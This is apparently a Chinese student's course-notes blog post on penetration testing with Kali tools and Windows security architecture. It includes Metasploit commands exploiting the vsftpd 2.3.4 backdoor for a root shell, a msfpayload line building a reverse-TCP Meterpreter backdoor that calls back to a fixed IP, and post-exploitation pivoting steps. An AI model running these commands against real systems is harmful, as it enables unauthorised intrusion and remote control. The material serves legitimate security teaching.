2017-2018-2 20179207 《网络攻防技术》第七周作业

kali视频(26-31)(漏洞利用)

漏洞利用之检索与利用

漏洞利用工具集

  • 1.searchsploit
Exploit Database->searchsploit

  • 2.pattern create测试漏洞

    armitage结合MSF进行利用

  • 3.jboss-autopwn-linux/win
    专门针对Jboss的漏洞利用工具

  • 4.ikat
    自动化开启,等待目标访问中招。

  • 5.termineter
    评估智能电表的安全性。

漏洞利用之metasploit基础

1.启动服务:

在kali中使用metasploit,需要先使用命令

service postgresql start

开启PostgreSQL数据库服务,使用命令

msfconsole

2.开启metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。

3.首先用nmap -sV扫描目标主机和端口上运行的软件的版本。结果显示目标主机运行着ftp服务器,且版本为vsftpd 2.3.4(此版本的vsftpd存在着漏洞,攻击者可以远程获取目标主机的root权限)。

4.输入use exploit/unix/ftp/vsftpd_234_backdoor,提示符提示进入到该路径下,show options查看需要设置的相关项。提示需要设置RHOST和RPORT(端口默认为21)

5.接下来选择payload,输入命令set payload,按Tab键自动补齐攻击载荷cmd/unix/interact,show options查看需要设置的相关项,设置结束后输入exploit即可实施攻击。

  1. 结果返回目标主机的shell,获取了目标主机的root权限,可以输入命令查看id、网络配置等,攻击也就可以顺利实施。

漏洞利用之Meterpreter介绍

1.生成Meterpreter后门;打开MSF,开启监听(选择exploit/multi/handler);在目标机器上执行door.exe;

2.msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe

3.查看自己的IP地址,LHOST、LPORT为reverse_tcp的参数,可以在msf里查看到(记得把服务启动)

4.用use exploit/multi/handler来接收返回的连接
设置reverse_tcp的LHOST、LPORT参数

漏洞利用之Metasploit后渗透测试

  • 1.查看跳板机的网卡
ifconfig
  • 2.添加路由表
run autoroute -s 10.0.0.1
  • 3.开socks代理
background 把session置于后台
search socks  使用socks开代理
use auxiliary/server/socks4a
showoptions
exploit
  • 4.通过background和sessions -i可以自由切换进入session
  • 5.输入run可以看到在meterpreter上可以做的很多命令
  • 6.通过run post/可以看到后渗透测试的模块
  • 7.扫描内网信息
run arp_scanner -r 目标IP地址

内网端口转发

upload lcx.exe c:\ 上传到C盘根目录

漏洞利用之beEf

1、在命令行下启动

BeeFbeef-xss

2、用户名和密码都是beef

3、输入测试网站,可以看到在线机器

4、对网站进行攻击

5、Proxy功能(代理功能)
选中目标主机,点右键,在菜单中选中Use as Proxy;然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容

6、BeEF默认是不加载Metasploit的,如果要使用Metasploit丰富的攻击模块,需要做些配置.
配置

首先打开beef xss目录
cd /usr/share/beef-xss/
ls
nano config.yaml

编辑一下,可以看到有很多配置信息,包括用户名、密码都可以在这设置,在此将Metasploit的false修改为true

漏洞利用之set

第七章 Windows操作系统安全防护

Windows操作系统的发展与现状

Windows在桌面操作系统中占有非常高的市场份额,Windows XP系统在国内仍有大量的用户

Windows操作系统基本结构
1、Windows操作系统内核基本模块:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。

2、Windows操作系统在用户态的代码模块:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。

3、核心机制:Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络机制。
Windows系统的网络结构,从OSI网络参考模型的物理层到应用层,各层对应的Windows网络组件模块包括:

①网卡硬件设备驱动程序,位于OSI物理层

②NDIS库及miniport驱动程序,位于OSI链路层

③TDI传输层,也被称为网络协议驱动,位于OSI网络层与传输层

④网络API DLL 及TDI客户端,对应OSI会话层与表示层

⑥网络应用程序与服务进程,对应OSI应用层

**Windows操作系统的安全体系结构与机制 **

1、Windows安全体系结构

基于引用监控器(Reference Monitor)模型来实现基本的对象安全模型。最核心的是位于内核中的SRM(Security Reference Monitor)安全引用监控器,以及位于用户态的LSASS安全服务。

2、Windows身份认证机制

分为用户,用户组,和计算机三大类。对于每个安全主体,以时间和空间上都全局唯一的SID安全标识符来进行标识。

Windows用户密码经过加密处理后被保存于SAM或者活动目录AD中,其中本地用户账户口令信息经过不可逆的128位随机秘钥Hash加密后存储在SAM文件中。

Windows进程、GINA图形化登录窗口,与LSASS服务通过协作来完成本地身份认证过程。

3、Windows授权与访问控制机制

Windows授权与访问控制机制是基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同来实施。

Windows对于系统中所有需要保护的资源都抽象成对象,而对每个对象会关联一个SD安全描述符(Security Descriptor)都会关联一个对象描述符,有以下属性组成:Owner SID、Group SID、DACL 自主访问控制列表、SACL 系统审计访问控制列表。

4、Windows安全审计机制

系统审计策略在本地安全策略中由系统管理员定义,来确定系统对哪些事件进行记录。

5、Windows的其他安全机制

Windows安全中心中集成了对于保护Windows系统安全稳定运行最为关键的三项安全措施:防火墙,补丁自动更新,以及病毒防护。除了安全中心外,Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等。

6、Windows远程安全攻防技术

Windows远程攻击技术可分为:远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户

7、Windows安全漏洞发现、利用与修补过程

安全漏洞公开披露信息库:几个知名的通用漏洞信息库:CVE、NVD、SecurityFocus、OSVDB等。

8、针对特定目标的渗透测试攻击过程:

①漏洞扫描测试

②查找针对发现漏洞的渗透代码

③实施渗透测试

9、使用Metasploit软件实施渗透测试

Metasploit是完全开源的渗透测试软件。采用开发框架和模块组件的可扩展模型,以Ruby语言编写的Metasploit

Framework(MSF)库作为整个软件的基础核心,为渗透测试组件的开发与测试提供平台;模块组件是真正实施渗透攻击的代码。

Metasploit提供了CLI、Console、Web和GUI四种不同的用户交互接口,其中Console终端是比较常用的方式。

10、Windows远程口令猜测与破解攻击

  • 远程口令自猜测
  • 远程口令字交换通信窃听与破解
  • 远程口令猜测与破解防范措施

11、Windows网络服务远程渗透攻击

Windows操作系统默认开放135(TCP),137(UDP),139(TCP)与445(TCP)端口,对应的网络服务为MSRPC与过程调用服务,NetBIOS网络基本输入输出系统服务和SMB文件与打印机共享服务。

  • 针对NetBIOS网络服务的著名漏洞及攻击
  • 针对SMB网络服务的著名漏洞及攻击
  • 针对MSRPC网络服务的著名漏洞及攻击
  • 针对Windows系统上微软网络服务的远程渗透攻击
  • 针对Windows系统上第三方网络服务的远程渗透攻击

12、网络服务远程渗透攻击防范措施

  • Windows本地安全攻防技术
  • Windows本地特权提升
  • 终极特权:Administrator或者Local System账户。从受限用户权限尝试获得特权账户的攻击技术也被称为特权提升。

13、Windows敏感信息窃取

  • Windows系统口令字密文提取技术
  • Windows系统口令字破解技术
  • 用户敏感数据窃取
  • 本地敏感信息窃取防范措施

14、Windows消踪灭迹

  • 关闭审计功能
  • 清理事件日志
  • 针对消踪灭迹的防范措施

15、Windows远程控制与后门程序

  • 命令行远程控制工具
  • 图形化远程控制工具
  • 针对后门程序防范措施

posted @ 2018-04-21 17:53  Katherina.K  阅读(438)  评论(0编辑  收藏  举报